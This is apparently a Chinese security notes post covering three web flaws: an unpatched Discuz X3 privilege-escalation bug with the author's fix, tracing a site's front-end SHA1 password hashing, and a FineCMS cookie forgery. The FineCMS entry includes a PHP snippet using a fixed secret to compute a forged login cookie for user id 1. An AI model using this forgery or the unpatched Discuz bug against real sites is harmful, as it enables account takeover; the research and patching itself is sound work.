##Discuz x3 越权操作 这个漏洞是朋友通过黑盒测试发现, 然后我写了个补丁 。 此时尚未修复就不透露细节, 看的懂的人自己会用。 此处直接传入用户的值, 没有校验该贴是否属于当前用户导致 越权产生 foreach($topiclist as $pid) { $post = C::t('forum_post')->fetch('tid:'.$_G['tid'], $pid, false); $sticktopiclist[$pid] = $post['position']; } 后面进行操作 ......... 我自己写的修复方法 ,官方此漏洞暂未修复。 // 通过全局函数获取当前用户的帖子,...
##网站登录密码前端加密破解 某网站登陆前端将密码进行了加密 我通过搜索找到了js 文件 然后下断点观察 找到关键函数, 此函数调用了hex_sha1 方法对密码进行了加密处理 fdLogin.login = function (uName, pwd, status, ckCallback) { pwd = hex_sha1(pwd); pwd = hex_sha1(uName + pwd); pwd = hex_sha1(pwd + this.vccode); 我继续跟踪...
##Finecms Cookie伪造
/controllers/member/LoginController.php
看上去很容易被伪造只要知道 SITE_MEMBER_COOKIE 就行了
cookie表前缀+字符串 ,我通过github搜索发现字符串并不是随机生成的而是固定的值
set_cookie('member_id', $member['id'], $time);
set_cookie('member_code', substr(md5(SITE_MEMBER_COOKIE . $member['id']), 5, 20), $time);
构造cookiehash
<?php
$hash = substr(md5("2967e68d382902a"."1"), 5, 20);
echo $hash;
?>